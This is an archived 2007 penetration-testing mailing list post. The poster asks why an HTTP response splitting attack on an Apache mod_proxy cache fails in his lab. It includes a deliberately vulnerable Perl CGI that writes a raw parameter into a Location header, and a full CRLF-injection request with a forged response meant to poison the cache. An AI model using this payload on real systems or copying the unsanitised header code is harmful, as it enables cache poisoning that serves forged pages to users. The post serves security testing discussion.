Penetration Testing mailing list archives
Http splitting working example
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Thu, 29 Nov 2007 17:53:02 +0200
Hi list. Hope somebody will spent some time on my question :), or point me to the right list. Is http splitting still works in fresh version of common applications (squid, apache)? I've wrote sample application (cgi script) vulnerable to it, however apache mod_proxy just ignores the answer, and initiates a new connection for each request. Chain: Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi. Proxy is on localhost. Goal: poison mod_proxy's cache The cgi is: #!/usr/bin/perl use CGI qw(:standard); print "Status: 302 Moved\nLocation: ".param('name')."\n\n"; The attemt to exploit is: #nc localhost 80 GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html> HTTP/1.1 Host: test.xxx HTTP/1.1 302 Moved Date: Thu, xx Nov 2007 xx:25:03 GMT Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2 Location: Foo Content-Length: 0 Content-Type: text/plain Via: 1.1 client.xxx (Apache/2.xx) GET http://test.xxx/1.html HTTP/1.1 Host: test.xxx HTTP/1.1 200 OK Date: Thu, xx Nov 2007 15:25:09 GMT Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2 Last-Modified: Thu, xx Nov 2007 xxx GMT ETag: "2c8be-2-c4f7b640" Accept-Ranges: bytes Content-Length: 2 Content-Type: text/html 1 However, as I've found, mod_proxy initiates a new connection for the second GET. That breaks the whole idea to exploit http splitting. Is it some kind of new protection feature in apache mod_cache? Please, could anybody provide a brief description of common applications on which attack is working. It seems vendors have done a great job (like filtering characters in PHP header, or Tomcat). -- Best regards. Gleb Pakharenko. ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Http splitting working example Gleb Paharenko (Nov 29)